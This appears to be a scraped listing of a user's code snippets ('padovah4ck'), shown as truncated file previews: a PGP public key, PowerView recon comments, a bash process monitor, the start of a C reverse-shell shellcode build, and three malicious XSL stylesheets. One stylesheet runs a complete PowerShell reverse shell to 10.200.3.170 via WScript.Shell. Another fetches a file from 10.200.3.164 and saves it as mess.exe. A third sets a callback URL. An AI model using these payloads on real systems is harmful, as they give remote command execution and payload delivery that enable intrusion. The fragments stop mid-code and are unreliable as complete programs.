padovah4ck

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: FlowCrypt  Email Encryption - flowcrypt.com
Comment: Seamlessly send, receive and search encrypted email

xsFNBFyY868BEACqHhE2O0vEoFiLlmY2F20vf3lmheSESHENhE6QJFGmg4w5
i+PwORdcYXH+2LSvu8+XFrF9HGMyYgP3e9hruJHqVolyTGNavRcwKUiIE9Qz
ZPEw9rZTHa3T3uupJJeQEWba5SFmbh5av9sZEqwPC2aiZX9Y4a0LBKHJA2rh
/+roJlpLrI2jAqDEJ0j1EfqXiGMcPiAfkiZp1KvKcPrElrIpP0ysnevKbdCO
Jkt/7W0cl1GxWcCqOyxjJwjJwj9JmsXgIUNMB//Cv1YYWkDmhfI8MQak8til
LGbNHnvWCIX74168kE57/J1rUCogHrrGzIqdH4TkuquN1FNIwkT+Cr1OfxH2

padovah4ck

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

padovah4ck

#!/bin/bash

# Loop by line
IFS=$'\n'

old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)

while true; do
  new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
  diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]

padovah4ck

/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
//
// gcc reverse_shell.c -fno-stack-protector -Os -z execstack -no-pie -o shellcode
// for i in `objdump -d ./shellcode | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done ; echo


#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>

padovah4ck

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command \"$client = New-Object System.Net.Sockets.TCPClient('10.200.3.170',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",0,true);
	]]> </ms:script>

padovah4ck

<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="VB">
	<![CDATA[
  
strFileURL = "http://10.200.3.164/server.py"
strHDLocation = "mess.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false

padovah4ck

<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="VBScript">
	<![CDATA[

Option Explicit
On Error Resume Next

CONST callbackUrl = "http://10.200.3.164:80/"